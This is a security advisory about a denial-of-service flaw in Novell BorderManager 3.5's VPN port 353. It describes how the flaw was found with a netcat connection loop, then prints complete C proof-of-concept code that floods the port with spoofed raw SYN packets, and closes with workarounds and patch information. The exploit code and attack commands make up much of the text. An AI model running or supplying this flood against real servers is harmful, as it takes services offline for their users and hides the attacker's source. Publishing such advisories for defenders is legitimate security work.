

    BorderManager 3.5


    Richard  Bartlett   found  following.    Whilst   pen  testing   a
    BorderManager 3.5  server he  came across  a problem  which he has
    now reproduced  twice, and  it is  believed to  be a vulnerability
    either in Novell's TCP/IP  stack or in BorderManager  VPN, details

    (*) One  of  the  ports  open  on  the  outbound interface of  the
        BorderManager  server  is  353,   which  allows  for   initial
        handshaking between VPN Client & Server to exchange the Keys.
    (*) Richard verified the port was open using a port scanner.
    (*) He ran the command

        for /l %%h in (1, 1, 300) do nc -d -z [server ip] 353

        (works from Windows NT or 2000).
    (*) After  running the  command the  port appears  closed and  VPN
        connections can no longer be made.
    (*) On  checking  the  server  logs  it was found that after  ~250
        connections  are  opened,  the  server  runs  out  of   TCP/IP
        connections, and all further connection attempts fail with the
        error  message   "No  more   TCP/IP  client   connections  are
    (*) Re-loading  vpn  and  re-initialising  the  system  failed  to
        resolve  the  problem,  and  the  only  way to fix the problem
        appeared to be to reboot the server.
    (*) No error messages other than those in the VPN log were  found,
        no console messages warned  that the service was  unavailable,
        and there was no other indication of a fault.

    So, sending  out multiple  SYN requests  to a  port on  the server
    will  cause  exhaustion  of  the  available TCP connections on the
    server.  The following  command will open multiple  connections to
    port 353 (as said above):

        for /l %%h in (1, 1, 300) do nc -d -z 353

    Once  ~256  connections  are  made  the  port  fails to respond to
    further SYN requests,  and the server  logs show that  all further
    connections are refused  with the message  'No more TCP/IP  client
    connections  are  available'.   Until  the  server  is rebooted or
    reinitialized all  client-to-site VPN  will fail  (thereby forcing
    users to revert to an unsecure form of data transmission, e.g. FTP
    or POP3, which both use clear text passwords).

    The  server  tested  on  was  left  for  over  48  hours  to allow
    connections to be  freed up by  the system, but  the port remained

    Various measure were taken to  resolve the issue.  The  server was
    patched  with  NetWare  5.1  Support  Pack  2a,  BorderManager 3.5
    Support Pack 2  and BorderManager 3.5  Proxy and ACL  update.  The
    latest TCPIP.NLM  was in  use and  the server  had TCP  Defend SYN
    Attacks ON.

    DoS code:

    /* 29.4.2001
       Proof of concept DoS Novell BorderManager Enterprise Edition 3.5
       DoSs are lame, i know, but boredom is ugly. DON'T ABUSE.
       greets: jimjones, doing, darkcode for his paper about raw sockets
       and all helisec guys.
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <time.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #define __FAVOR_BSD
    #include <netinet/tcp.h>
    #define PORT 353
     /* to be easier the processing, this struct :) */
     struct pseudohdr {
             struct in_addr saddr;
             struct in_addr daddr;
             u_char zero;
             u_char protocol;
             u_short len;
             struct tcphdr tcpheader;
    unsigned long resolve(name)
	    char *name;
    struct in_addr h2;
    struct hostent *hname;
    if (!(hname = gethostbyname(name))) return(0);
    memcpy((char *)&h2.s_addr, hname->h_addr, hname->h_length);
     /* checksum ripped and modified by me */
    checksum (data, length)
	    u_short *data;
	    u_short length;
    register long value;
    u_short i;
          for (i = 0; i < (length >> 1); i++)
           value += data[i];
           if ((length & 1) == 1)
           value += (data[i] << 8);
           value = (value & 65535) + (value >> 16);
           return (~value);
    void packet(vic, socket)
	    struct sockaddr_in *vic;
	    int socket;
     int count;
     char buf[40];
     struct ip *ipheader = (struct ip *)buf;
     struct tcphdr *tcpheader = (struct tcphdr *)(buf + sizeof(struct ip));
     bzero (&buf, (sizeof(struct ip) + sizeof(struct tcphdr)) );
 	    /* filling ip struct */
 	    ipheader->ip_v = IPVERSION;
 	    ipheader->ip_hl = 5;
 	    ipheader->ip_tos = htons(0);
 	    ipheader->ip_len = htons(sizeof(buf));
 	    ipheader->ip_id = rand() % 0xffff;
 	    ipheader->ip_off = htons(0);
 	    ipheader->ip_ttl = 0xff;  /* 255 hex */
 	    ipheader->ip_p = IPPROTO_TCP;
 	    ipheader->ip_src.s_addr = rand();
 	    ipheader->ip_dst.s_addr = vic->sin_addr.s_addr;
 	    ipheader->ip_sum = 0;
 	    /* filling tcphdr struct */
 	    tcpheader->th_sport = 2424; /* random */
 	    tcpheader->th_dport = vic->sin_port;
 	    tcpheader->th_seq = htonl(0xF1C); /* random */
 	    tcpheader->th_ack = 0;
 	    tcpheader->th_off = 5;
 	    tcpheader->th_flags = TH_SYN; /* the important flag */
 	    tcpheader->th_win = 4096;
 	    tcpheader->th_sum = 0;
     bzero (&pseudoh, 12 + sizeof(struct tcphdr));
     pseudoh.saddr.s_addr = rand();
     pseudoh.daddr.s_addr = vic->sin_addr.s_addr;
     pseudoh.protocol = 6;
     pseudoh.len = htons (sizeof(struct tcphdr));
     memcpy((char *)&pseudoh.tcpheader, (char *)tcpheader, sizeof (struct tcphdr));
     tcpheader->th_sum = checksum((u_short *)&pseudoh, 12 + sizeof (struct tcphdr));
     /* sending packets, DON'T ABUSE! */
    for (count = 0; count < 260; count++) {
      if ( (sendto(socket,
 	       (sizeof(struct iphdr) + sizeof(struct tcphdr)),
 	       (struct sockaddr *)vic,
 	       sizeof(struct sockaddr_in))) < 0) {
 	       fprintf(stderr, "Error sending packets\n");
    close (socket);
    void usage(proggy)
	    char *proggy;
	    fprintf(stderr,"DoS a Novell BorderManager Enterprise Edition 3.5\n");
	    fprintf(stderr, " from helisec\n");
	    fprintf(stderr, "Usage: %s host\n", proggy);
    main(argc, argv)
	    int argc;
	    char *argv[];
      struct sockaddr_in h;
      int s0ck, uno = 1;
      if (argc < 2)
      bzero(&h, sizeof(h));
      h.sin_family = AF_INET;
      h.sin_port = htons(PORT);
    if ( (inet_pton(AF_INET, argv[1], &h.sin_addr)) <= 0)
	    h.sin_addr.s_addr = resolve(argv[1]);
    if (!h.sin_addr.s_addr) {
	    fprintf(stderr, "Error resolving host\n");
    if ((s0ck = socket(AF_INET, SOCK_RAW, 255)) < 0) {
            fprintf(stderr, "Error creating raw socket, root is needed\n");
            exit (-1);
    setsockopt(s0ck, SOL_SOCKET, SO_BROADCAST, &uno, sizeof(uno));
    packet(&h, s0ck);
    fprintf(stderr, "DoS completed.\n");


    Re-loading VPMASTER.NLM failed to resolve the problem.  Re-loading
    AUTHGW.NLM  show  the  report  re-opened  the  port,  but   client
    connections  still  failed.   The  only  corrective  action   that
    consistently resolved the problem  was rebooting the server.   The
    following did work but not consistently:

        (1) Unload VPMASTER.NLM
        (2) Unload AUTHGW.NLM
        (3) Reinitialize system
        (4) Load AUTHGW.NLM
        (5) Load VPMASTER.NLM

    A possible  way to  solve this  problem is  to modify  the default
    filter  exceptions  that  where  added  by vpncfg.nlm.  Only allow
    access  to  that  port  from  host(s)  or  subnets where known vpn
    clients  or  slave  servers  are  being  used.   Granted  it would
    restrict access to vpn clients that never use the same address  or
    subnet, but it just a work around until a patch can be applied.

    The patch for the DoS  against the Border Manager VPN  service was
    released on 27 April: